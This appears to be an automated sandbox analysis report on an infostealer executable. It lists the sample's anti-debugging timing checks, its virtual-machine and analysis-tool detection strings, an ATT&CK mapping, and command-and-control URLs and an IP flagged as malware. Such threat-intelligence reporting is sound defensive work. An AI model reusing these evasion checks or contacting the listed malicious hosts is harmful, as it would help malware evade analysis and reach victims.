Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 78E0AFC second address: 78E0B02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A1E second address: 7930A3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov cx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF108C7BF10h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A3D second address: 7930A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A43 second address: 7930A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930A47 second address: 7930A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910012 second address: 7910038 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bl 0x00000005 mov ch, 48h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FF108C7BF12h 0x00000010 mov dword ptr [esp], ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910038 second address: 791003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 791003C second address: 7910042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910042 second address: 7910111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 14F1h 0x00000007 pushfd 0x00000008 jmp 00007FF10887397Eh 0x0000000d and cx, E3C8h 0x00000012 jmp 00007FF10887397Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d jmp 00007FF108873986h 0x00000022 and esp, FFFFFFF0h 0x00000025 jmp 00007FF108873980h 0x0000002a sub esp, 44h 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007FF10887397Eh 0x00000034 xor cx, 9888h 0x00000039 jmp 00007FF10887397Bh 0x0000003e popfd 0x0000003f pushfd 0x00000040 jmp 00007FF108873988h 0x00000045 xor eax, 466EFAE8h 0x0000004b jmp 00007FF10887397Bh 0x00000050 popfd 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 jmp 00007FF108873986h 0x00000058 push eax 0x00000059 jmp 00007FF10887397Bh 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910111 second address: 7910117 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910117 second address: 7910194 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, A3h 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF10887397Ah 0x00000013 adc ecx, 50A872D8h 0x00000019 jmp 00007FF10887397Bh 0x0000001e popfd 0x0000001f mov ebx, ecx 0x00000021 popad 0x00000022 mov dword ptr [esp], esi 0x00000025 pushad 0x00000026 push esi 0x00000027 pushfd 0x00000028 jmp 00007FF108873987h 0x0000002d sub ax, CA4Eh 0x00000032 jmp 00007FF108873989h 0x00000037 popfd 0x00000038 pop ecx 0x00000039 popad 0x0000003a xchg eax, edi 0x0000003b jmp 00007FF10887397Ah 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910194 second address: 7910198 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910198 second address: 79101B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108873988h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79101B4 second address: 7910216 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c mov bh, B5h 0x0000000e pushfd 0x0000000f jmp 00007FF108C7BF12h 0x00000014 or cx, EB88h 0x00000019 jmp 00007FF108C7BF0Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov edi, dword ptr [ebp+08h] 0x00000023 jmp 00007FF108C7BF16h 0x00000028 mov dword ptr [esp+24h], 00000000h 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007FF108C7BF0Ah 0x00000039 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7910216 second address: 7910225 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF10887397Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940840 second address: 7940844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940844 second address: 794084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 794084A second address: 79408BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF108C7BF0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007FF108C7BF11h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 mov dl, A3h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 mov al, B7h 0x0000001a mov esi, edi 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 jmp 00007FF108C7BF19h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushfd 0x00000028 jmp 00007FF108C7BF0Eh 0x0000002d and si, 6858h 0x00000032 jmp 00007FF108C7BF0Bh 0x00000037 popfd 0x00000038 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 79408BA second address: 79408BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930941 second address: 7930954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, dl 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7930954 second address: 7930959 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940A88 second address: 7940A8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940A8C second address: 7940A90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940A90 second address: 7940A96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940A96 second address: 7940A9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940A9C second address: 7940AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940AA0 second address: 7940AA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940AA4 second address: 7940B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF108C7BF10h 0x0000000e push eax 0x0000000f jmp 00007FF108C7BF0Bh 0x00000014 xchg eax, ebp 0x00000015 pushad 0x00000016 mov ecx, 5341158Bh 0x0000001b mov di, ax 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FF108C7BF18h 0x00000028 add al, FFFFFFC8h 0x0000002b jmp 00007FF108C7BF0Bh 0x00000030 popfd 0x00000031 push eax 0x00000032 push edx 0x00000033 pushfd 0x00000034 jmp 00007FF108C7BF16h 0x00000039 sbb ecx, 17CF0B28h 0x0000003f jmp 00007FF108C7BF0Bh 0x00000044 popfd 0x00000045 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940B2A second address: 7940B51 instructions: 0x00000000 rdtsc 0x00000002 mov dx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FF108873987h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940B51 second address: 7940B56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRDTSC instruction interceptor: First address: 7940B56 second address: 7940B6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF108873982h 0x00000009 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSpecial instruction interceptor: First address: 12E0A25 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSpecial instruction interceptor: First address: 148966B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSpecial instruction interceptor: First address: 1487B77 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSpecial instruction interceptor: First address: 14B2EEB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSpecial instruction interceptor: First address: 12E0984 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00D79980 rdtsc 0_2_00D79980
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00B9255D
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B929FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00B929FF
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00B9255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00B9255D
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: TX5LAYBZRI.exe, 00000000.00000003.2065120521.00000000020C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: TX5LAYBZRI.exeBinary or memory string: Hyper-V RAW
Source: TX5LAYBZRI.exe, 00000000.00000003.2124954630.0000000002112000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125285281.0000000002124000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125032525.000000000211F000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139392005.0000000002125000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllpd
Source: TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_079404BA Start: 0794066B End: 079405EA0_2_079404BA
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile opened: NTICE
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile opened: SICE
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeCode function: 0_2_00D79980 rdtsc 0_2_00D79980
Source: TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oVv)SProgram Manager
Source: TX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000002.2138468691.0000000001469000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Vv)SProgram Manager
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\TX5LAYBZRI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.5:49706 -> 34.147.147.173:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		23
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory23
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
TX5LAYBZRI.exe47%VirustotalBrowse
TX5LAYBZRI.exe100%AviraTR/Crypt.TPM.Gen
TX5LAYBZRI.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZ100%Avira URL Cloudmalware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fortth14vs.top
34.147.147.173
truefalse
    		high
    httpbin.org
    		34.200.57.114
    		truefalse
      		high

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0true
      • Avira URL Cloud: malware
      		unknown
      http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738true
      • Avira URL Cloud: malware
      		unknown
      https://httpbin.org/ipfalse
        		high

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://curl.se/docs/hsts.htmlTX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
          		high
          http://html4/loose.dtdTX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
            		high
            https://curl.se/docs/alt-svc.html#TX5LAYBZRI.exefalse
              		high
              https://httpbin.org/ipbeforeTX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMahTX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                https://curl.se/docs/http-cookies.htmlTX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
                  		high
                  http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
                  • Avira URL Cloud: malware
                  		unknown
                  https://curl.se/docs/hsts.html#TX5LAYBZRI.exefalse
                    		high
                    http://home.fortth14vs.top/gduZTX5LAYBZRI.exe, TX5LAYBZRI.exe, 00000000.00000003.2124954630.0000000002112000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125285281.0000000002124000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125032525.000000000211F000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139392005.0000000002125000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: malware
                    		unknown
                    https://curl.se/docs/http-cookies.html#TX5LAYBZRI.exefalse
                      		high
                      https://curl.se/docs/alt-svc.htmlTX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
                        http://.cssTX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
                          		high
                          http://.jpgTX5LAYBZRI.exe, 00000000.00000003.2045126390.0000000007C3F000.00000004.00001000.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2137568261.0000000001170000.00000040.00000001.01000000.00000003.sdmpfalse
                            		high
                            http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lseTX5LAYBZRI.exe, 00000000.00000003.2125569370.00000000020B2000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000003.2125601591.00000000020B7000.00000004.00000020.00020000.00000000.sdmp, TX5LAYBZRI.exe, 00000000.00000002.2139117572.00000000020B9000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            34.147.147.173
                            		home.fortth14vs.topUnited States
                            		2686ATGS-MMD-ASUSfalse
                            34.200.57.114
                            		httpbin.orgUnited States
                            		14618AMAZON-AESUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1582833
                            Start date and time:2024-12-31 15:46:08 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 50s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:TX5LAYBZRI.exe
                            renamed because original name is a hash value
                            Original Sample Name:94dfcba69551e571570208f53fac90d6.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@1/0@9/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 51%
                            • Number of executed functions: 139
                            • Number of non-executed functions: 51
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded IPs from analysis (whitelisted): 52.149.20.212
